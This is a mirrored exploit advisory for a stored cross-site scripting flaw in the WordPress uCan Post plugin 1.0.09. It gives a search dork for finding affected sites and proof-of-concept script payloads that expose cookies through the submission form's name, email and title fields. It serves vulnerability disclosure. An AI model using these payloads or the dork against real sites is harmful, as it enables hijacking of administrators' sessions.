Lucene search
K

WordPress uCan Post 1.0.09 Cross Site Scripting

🗓️ 19 Jan 2012 00:00:00Reported by Gianluca BrindisiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Wordpress uCan Post 1.0.09 Stored XSS vulnerabilit

Code
`# Exploit Title: Wordpress uCan Post plugin <= 1.0.09 Stored XSS  
# Dork: inurl:/wp-content/plugins/ucan-post/  
# Date: 2012/01/18  
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)  
# Software Link: http://downloads.wordpress.org/plugin/ucan-post.1.0.09.zip  
# Version: 1.0.09  
  
1) You need permissions to publish a post from the public interface:  
  
The submission form is not well sanitized and will result in stored xss  
in admin pages:  
  
* Name field is not sanitized and it's injectable with a payload  
which will be stored in the pending submission page in admin panel  
POC: myname'"><script>window.alert(document.cookie)</script>  
  
* Email field is not sanitized but can it will check for a valid email address  
so the maximum result will be a reflected xss  
POC: [email protected]'"><script>window.alert(document.cookie)</script>  
  
* Post Title is not sanitized and it's injectable with a payload  
which will be stored in the pending submissions page in admin panel  
POC: title'"><script>window.alert(document.cookie)</script>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jan 2012 00:00Current
7.4High risk
Vulners AI Score7.4
17